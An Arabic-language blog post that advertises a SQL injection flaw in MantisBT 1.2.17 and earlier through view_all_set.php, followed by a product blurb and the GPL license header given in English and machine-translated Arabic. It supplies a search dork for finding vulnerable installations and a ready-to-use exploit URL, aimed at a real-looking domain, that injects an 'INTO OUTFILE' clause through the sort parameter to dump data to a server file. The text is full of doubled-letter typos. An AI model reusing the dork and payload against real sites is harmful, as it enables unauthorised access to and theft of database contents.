ثغره مع التنزيل MantisBT view_all_set.php Multiple SQL Injection Vulnerabilities

مشاهدات الان
sfehthayef.blogspot.com
المثال لبرمجه
https://mantisbt.org/

التنزيل باخر اصدار من المصدر
mantisbt
البحث يكون كتالي
Powered by MantisBT 1.3.0devmaster-e704f56
Copyright © 2000 - 2014 MantisBT Team
Contact administrator for assistance
الثغره
MantisBT 1.2.17 and prior are vulnerable
MantisBT 'view_all_set.php' Multiple SQL Injectionn Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI is available: http://kuwait.com/view_all_set.php?sort=id,severity,status+DESC+INTO+OUTFILE+%27/tmp/sql_dump.txt%27+--&dir=ASC,ASC,ASC&type=2
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. MantisBT has been ...
MantisBT هو حر نظام تتبع علة على شبكة الإنترنت شعبية. هو مكتوب في PHPP يعمل مع MySQL، MS SQL وقواعد البيانات كيو. وكان MantisBT ...
# MantisBT - a php based bugtracking system
# MantisBT is free software: you can redistribute it and/orr modify
# it under the terms of the GNU General Public License ass published by
# the Free Software Foundation, either version 2 of the License,, or
# (at your option) any later version.
# MantisBT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the impliedd warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULARR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Publicc License
# along with MantisBT. If not, seee <http://www.gnu.org/licenses/>.
* @package MantisBT
* @copyright Copyright (C) 2000 - 2002 Kenzaburo Ito -- kenito@300baud.org
* @copyright Copyright (C) 2002 - 2014 MantisBT Team -- mantisbt-dev@lists.sourceforge.net
* @link http://www.mantisbt.org
# MantisBT - نظام bugtracking فب مقرها
# MantisBT هي البرمجيات الحرة: يمكنك إعادة توزيعه و / أو تعديله
# تحت شروط رخصة جنو العمومية والتي نشرتها
# مؤسسة البرمجيات الحرة، إما الإصدار 2 من الرخصة، أو
# (باختيارك) أي إصدار لاحق.
يتم توزيع # MantisBT على أمل أن يكون مفيدا،
# ولكن دون أي ضمان؛ حتى دون ضمان ضمني
# التسويق أو الملاءمة لغرض معين. رؤية
# رخصة جنو العمومية العامة لمزيد من التفاصيل.
# من المفترض أنك تلقيت نسخة من رخصة جنو العمومية العامة
# جنبا إلى جنب مع MantisBT. إن لم يكن، انظر <http://www.gnu.org/licenses/>.
*package MantisBT
*copyright حقوق النشر (C) 2000-2002 كينزابورو إيتو -- kenito@300baud.org
*copyright حقوق النشر (C) 2002-2014 MantisBT فريق - mantisbt-dev@lists.sourceforge.net
*link http://www.mantisbt.org
وسلامتكم
اذا حبيت نسخ المقالهـ

ليست هناك تعليقات:

إرسال تعليق